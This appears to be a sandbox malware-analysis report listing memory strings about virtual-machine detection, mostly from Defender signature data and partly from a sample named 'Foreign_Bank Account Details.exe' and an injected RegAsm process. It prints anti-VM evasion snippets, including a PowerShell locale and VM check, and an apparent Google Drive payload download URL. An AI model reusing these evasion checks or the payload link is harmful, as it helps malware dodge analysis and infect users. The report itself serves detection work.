Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp Binary or memory string: ARM_big_endianARM_legacyARM_unpredictable_16bitmachine_32bitmachineaggressive_trim_wsaggressiveimportamd64_imagearm_imageaslr_bit_setbound_imports_inside_imagebyte_reversed_hibyte_reversed_lowcalls_unimplemented_apichecks_if_debugged_documentedchecks_if_debugged_undocumentedchecks_ntglobalflagchecks_processheapchecks_teb_lasterrorchecks_teb_laststatuscode_on_stackdebug_strippeddeep_analysisdeep_apicall_limitdelay_load_imports_inside_imagedetects_virtualpcdetects_vmdetects_vmwaredirty_wx_branchdisable_apicall_limitdisable_drop_mz_onlydisable_dropper_rescandisable_io_redirectiondisable_microcodedisable_seh_limitdisable_static_unpackingdisable_thread_apicall_limitdisable_vmprotectdmg_decompressdmg_entrypointdmg_filealignmentdmg_imagebasedmg_imagesizedmg_importsdmg_invaliddatadmg_machinedmg_not_executable_imagedmg_notcontiguousdmg_optional_magicdmg_overlapping_sectionsdmg_pointertorawdatadmg_relocationsdmg_resource_levelsdmg_resource_namesdmg_resource_offsetdmg_resource_unordereddmg_sectionalignmentdmg_sizeofheadersdmg_sizeofrawdatadmg_special_sectiondmg_truncateddmg_unsupporteddmg_virtualaddressdmg_virtualsizedroppeddt_continue_after_unpackingdt_continue_after_unpacking_damageddt_error_bb_limitdt_error_failed_to_translatedt_error_heur_API_limitdt_error_heur_exit_criteriadt_error_invalid_opcodedt_error_loop_too_complexdt_error_not_enough_memorydt_error_too_many_operandsdt_error_too_many_prefixesdt_error_vmm_page_faultdynmem_APIcalldynmem_checks_if_debugged_docdynmem_checks_if_debugged_undocdynmem_checks_ntglobalflagdynmem_checks_processheapdynmem_detects_virtualpcdynmem_detects_vmdynmem_detects_vmwaredynmem_kernel_scandynmem_reads_vdll_codedynmem_self_modifying_codedynmem_uses_access_violationdynmem_uses_bound_exceptionsdynmem_uses_breakpointsdynmem_uses_div_by_zerodynmem_uses_int_overflowdynmem_uses_invalid_opcodesdynmem_uses_privinstrdynmem_uses_single_steppingdynmem_uses_udbgrddynmem_uses_udbgwrdynmem_uses_unusual_breakpointenable_binlibenable_lshashenable_vmm_growentrybyte55entrybyte60entrybyte90entrypoint_in_headerentrypoint_in_import_tableepatscnstartepatstartentrysectepatstartlastsectepcallnextepinfirstsectepiniatepoutofimageepscn_eqsizesepscn_falignepscn_islastepscn_valignepscn_vfalignepscn_writableepsec_not_executableexecutable_imageexecutble_imageexecutes_from_dynamic_memoryexecutes_from_last_sectionexecutes_from_resourcesextended_pestaticfirstsectwritableforce_dtforce_expensive_processingforce_unpackinggenpackedhandle_large_vahas_checksumhas_delay_load_importshas_many_resourceshas_msilresourceshasappendeddatahasboundimportshasexportshasstandardentryheaderchecksum0hstr_exhaustiveia64_imageimport_via_tlsinv_argumentsinv_datainv_decompress_errorinv_dos_signatureinv_e_lfanewinv_exportsinv_fileinv_filealignmentinv_filesizeinv_imagebaseinv_nomemoryinv_notimplementedinv_nt_signatureinv_optional_magicinv_overlappinginv_rawoffsetinv_rawsizeinv_readinv_rvainv_sectionalignmentinv_sizeofheadersinv_sizeofimageinv_sizeofoptionalheaderinv_unsupported_mac
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: 4ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: vmmemctl
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp Binary or memory string: "/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: VMware_Virtual
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp Binary or memory string: Z"/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: z"vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp Binary or memory string: VBoxTrayToolWndClass
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: % *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWare
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17636064879.0000000002D19000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp Binary or memory string: vboxhook.dll
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp Binary or memory string: vmware
Source: MpSigStub.exe, 00000023.00000003.18300585182.0000015B1A681000.00000004.00000001.sdmp Binary or memory string: ,system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000023.00000003.18318011100.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: lbum.exeticket.zipuspsdhlspchPo.php?www=/release/setup.zipexe/release/install./release/new/setup.rar/index.php?c=RaE.scr.pdf..php?receipt_print=.php?receipt=/facebook//info.php?info=/info.php?label=/main.php?label=/main.php?info=/info.php?id=/flash/?/?d=/d/install.exe/index.php?key=.php?id=aJT.php?htm/setup.RPF:FakePAVURLinstall.SIGATTR:LoadsObscureDllRPF:LowFiObscureDllReadRPF:LowFiObfuscatorVM!Themida!CodeVirtualizer!Armadillo!Armadillo_4!Armadillo_5xRPF:DetectsVmWareRPF:DetectsVPCRPF:DetectsVMHSTR:VirTool:Win32/Obfuscator.YVSIGATTR:VirTool:Win32/Obfuscator.YV.2HSTR:Rogue:Win32/FakePAV_lowfiPEBMPAT:Trojan:Win32/Tibs_lowfiHSTR:Rogue:Win32/FakePAV_2_lowfiHSTR:Rogue:Win32/FakePAV_3_lowfianajbio.exesyuy2.exe~!#RPF:KaraganyFilename.BRPF:KaraganyFilename.A\AppData\Roaming\\Application Data\tfn.tmp.exeRPF:SkuffbotFilename.Asvchosts.exeRPF:SkuffbotFilename.BRPF:SkuffbotFilename.C.ps1.vbscod.gpj.gnp.txt.ftr.tpp.piz.rar.slx.fdp.RPF:RLOUnknownExtensionFilenameRPF:RLOFilenameRPF:RLOUnknownExtensionFilenameType1client.dllClient.dllclient_p.dllclient32_p.dllclient64_p.dlld64_p.dllmain_dll.dllinst_dll.dllVncDLL.dllRPF:CarberpVncDLLRPF:VawtrakDLLRPF:UrsnifDLLRPF:SampleCollectRPF:ObfuscatorWU.pif.scrIMG_FacebookRPF:PEWithImageFilename.Askype-imgprofile-imgprofile-facebookimg-facebookImages-Facebookimage-facebookDCIM-IMGSkype.ImageImage.Skypeskype_profilefileqemurecodispljrcgdwgpixbmpRPF:PEWithImageFilename.Bjpgimgapi_irispngr.out.png.exer.in.png.exe.pdfPrologue.Web.PDF.exeRPF:PEWithDocFilename.A.doc.xls.ppt.htmjpegdocxxlsxpptx.html.JPG.zip\RPF:PEWithImageFilename.C%*s%*s%sRPF:Napolar_Section_NameRPF:SirefefInstallationPathEPaEPbEPd.virus@h
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: MpSigStub.exe, 00000023.00000003.18336377296.0000015B1BE9E000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXE
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp Binary or memory string: IsVmWare
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.RCT.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18289300479.0000015B1BD55000.00000004.00000001.sdmp Binary or memory string: dynmem_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.AVHD.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: =8*|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18318011100.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: RPF:DetectsVmWare
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp Binary or memory string: VmWarePlayer
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxservice.exe")thenexit
Source: RegAsm.exe, 00000008.00000002.21888487316.000000000154A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWhT[
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17636064879.0000000002D19000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: MpSigStub.exe, 00000023.00000003.18298458791.0000015B1AD5A000.00000004.00000001.sdmp Binary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: %qemu
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.HRL.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp Binary or memory string: .VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: ,Administrator,Guest,vmware
Source: MpSigStub.exe, 00000023.00000003.18298458791.0000015B1AD5A000.00000004.00000001.sdmp Binary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: vmtools.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.VMCX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: virtual hd]
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp Binary or memory string: VMware
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: &!*.txt.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: vboxservice
Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp Binary or memory string: PSF1.00123456789ABCDEF0123456789abcdefpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_disable_apicall_limitpea_kernel_scanpea_uses_single_steppingpea_uses_breakpointspea_uses_privinstrpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_access_violationpea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_vsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_genpackedpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_access_violationpea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesiz
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: % *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp Binary or memory string: f)a.VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxMiniRdrDN
Source: RegAsm.exe, 00000008.00000002.21889262552.00000000015AE000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: Anti Sandboxie/VMware
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17634657037.00000000022D0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21890837219.0000000001710000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp Binary or memory string: myapp.exeqemu
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: AntiVmWare
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: FA*.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: % *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp Binary or memory string: sandboxvmware]
Source: RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.ISO.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: *.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp Binary or memory string: Global\VBoxService.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: ZU%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: vboxmrxnp.dll
Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp Binary or memory string: VMwareVMware
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.VSV.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17636064879.0000000002D19000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp Binary or memory string: Running on VMWare
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: VMware SVGA
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: %vmware
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: 3.%ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp Binary or memory string: if(((get-uiculture).name-match"ru|ua|by|cn")-or((get-wmiobject-classwin32_computersystem-propertymodel).model-match"virtualbox|vmware|kvm")){exit;}
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: &!*.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: vmGuestLib.dll
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: vmware.exe|
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp Binary or memory string: Virtual HD
Source: MpSigStub.exe, 00000023.00000003.18332083979.0000015B1A87C000.00000004.00000001.sdmp Binary or memory string: 8mus=mud_muramuyamuebmufbmuhbmu_emuiemuqemuimmujnmuhomubrmufrmu]tmuevmucwmucymu
Source: MpSigStub.exe, 00000023.00000003.18350289745.0000015B1B712000.00000004.00000001.sdmp Binary or memory string: *.log.|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.rom.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.txt.|!\qemu-system-aarch64.exe
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17636064879.0000000002D19000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp Binary or memory string: qemuvirtualvmware\\.\PhysicalDrive0
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: VMWare
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp Binary or memory string: vmwareservice.exe
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: >Host: virtualmachine-update.com
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.vhds.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: &!*.rom.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp Binary or memory string: detects_vmware
Source: MpSigStub.exe, 00000023.00000003.18298458791.0000015B1AD5A000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: Systeminfo | findstr /i modelExecToStackVirtualBoxVirtual MachineVMware
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: 1-driver-vmsrvc
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp Binary or memory string: vmsrvc
Source: RegAsm.exe, 00000008.00000002.21890837219.0000000001710000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1hKAWruhccvaKl722JOqs1briWjn1s8kswininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: .)*.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: VBoxService
Source: MpSigStub.exe, 00000023.00000003.18300585182.0000015B1A681000.00000004.00000001.sdmp Binary or memory string: *VMWARE*
Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp Binary or memory string: pea_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp Binary or memory string: aplicativos.netlhe.com/vmnetdhcp/
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: % *.rom.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: % *.toc.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.vhdpmem.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: idKasperkyVPCVMWareSandboxieHiJackThisgetDevicesRC4
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: \\vmware-host:Y
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp Binary or memory string: Vmware
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename_scrubbed
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: VBoxTray.exe
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp Binary or memory string: vmtools
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp Binary or memory string: vmtoolsx7
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.VHD.|*|Microsoft-Hyper-V
Source: RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: &!*.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18300585182.0000015B1A681000.00000004.00000001.sdmp Binary or memory string: *QEMU*
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: &!*.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: VBoxTray
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.VHDX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp Binary or memory string: vmtoolsd.exe
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17636064879.0000000002D19000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp Binary or memory string: "Microsoft Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: DetectVirtualMachine
